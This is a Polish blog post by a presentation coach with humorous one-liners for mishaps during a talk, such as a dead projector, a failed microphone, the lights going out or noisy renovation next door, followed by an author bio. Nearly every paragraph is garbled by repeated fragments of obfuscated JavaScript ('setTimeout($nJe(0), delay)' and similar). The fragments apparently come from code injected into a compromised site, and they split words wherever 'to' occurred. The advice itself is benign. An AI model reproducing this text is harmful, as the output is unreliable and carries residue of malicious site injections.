Jak radzić sobie w trudnych sytuacjach

Właśnie nawalił Ci rzutnik lub lapdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top, kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toś przypadkowo wyłączył oświetlenie w sali, nikt w hotelu nie potrafi wyłączyć klimatyzacji, za ścianą rozpoczął się remont – takie zdarzenia dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to koszmar każdego prezentera. “To koniec mojej prezentacji. Kompletna klapa” – myślisz. Ja jestem przeciwnego zdania. Takie nieprzewidziane zdarzenia możesz wykorzystać aby pokazać jaki jesteś błyskotliwy, dowcipny i… pewny siebie. Zawsze podkreślam: są sytuacje gdy tylko humor może nas uradom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować.

Publiczność lubi pewnych siebie mówców. Oczywiście bez przesady, nie mówimy tu o wywyższających się bufonach, pokazujących widowni “kdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tu rządzi”. Myślę raczej o tym, że Twoja widownia zobaczy, iż trafiła w “dobre ręce”. Ręce człowieka, który ma kontrolę nad sytuacją.

Wróćmy do tych “tragicznych” komplikacji, które wymieniłem na początku tego wpisu. Rzeczywiście mogą one utrudnić Ci kontynuowanie przemówienia ale właśnie w takiej chwili możesz pokazać widzom, jakim jesteś profesjonalistą a przy tym dowcipnym człowiekiem.

Powinieneś przygodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tować sobie krótkie, w miarę dowcipne komentarze. Nie muszą być bardzo śmieszne. Powinny sprawiać wrażenie wymyślonych na poczekaniu. Widzowie nawet jeśli nie pękną ze śmiechu, będą Cię podziwiać za “zimną krew”.

Odom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to kilka tekstów, które ja sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosuję w takich sytuacjach:
Nie mogę odtworzyć slajdów (awaria rzutnika lub lapdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topa). Mówię: “osoby o słabszych nerwach proszę o opuszczenie sali. Niestety nie działa moja prezentacja multimedialna, zatem będę musiał mówić z głowy.  Naprawdę nie wiem co się może w tej sytuacji wydarzyć”.

Nie działa mikrofon. Udaję, że mówię językiem migowym. Inna reakcja – mówię: “Naprawdę nie miałem zamiaru mówić nic co godziłoby w obronność naszego kraju. Jednak służby specjalne były innego zdania”

W sali nagle gaśnie światło. Mówię do zebranych: “jak już nam wyłączyli światło, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to mogli chociaż puścić jakąś nastrojową muzykę” albo: “mam nadzieję, że przyprowadziliście państwo kogoś ze sobą do pary”.

Hałasująca klimatyzacja, której nie można wyłączyć (miałem takie sytuacje). Komentuję wtedy krótko: “wygląda na dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, że nasze spotkanie upłynie w chłodnej atmosferze” lub “jeśli siedzicie Państwo przy kimś kogo bardzo lubicie, proponuję przytulić się”.

mlot_pmeumat_smallHałasy za ścianą (np. remont). Można powiedzieć: “No tak, Ci dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zawsze wiedzą kiedy zacząć. (lekko podnosząc głos): Panowie czas na przerwę, czas na Kitkat!”

To tylko kilka moich propozycji jak z humorem zachować się w takiej “nieprzewidzianej” sytuacji. Masz moją licencję na wykorzystywanie tych tekstów, oczywiście jeśli Ci się spodobały. Jeśli nie, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wymyśl  swoje wersje.

Gdy nie zdecydujesz się na żadna z moich propozycji i nie czujesz się na siłach tryskać humorem w trudnych momentach (ale uwierz mi, naprawdę wardom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to) pozostaje Ci inny sposób zachowania.
Masz dwie możliwości:
1. Udawać, że nic się nie dzieje (no poza awarią sprzętu – dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to musisz jakoś wytłumaczyć) i kontynuujesz wystąpienie
2. Skomentuj jak najkrócej: “O hałas za ścianą”; “O, wyłączyli nam światło, zaraz sprawdzę co się stało” ; “Klimatyzacja daje nam się we znaki zatem skrócimy nasze szkolenie” itp.

Ja jednak namawiam Cie do potrakdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towania z dystansem i humorem takich zdarzeń. Publiczność pokocha Cię za takie prowadzenie prezentacji.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply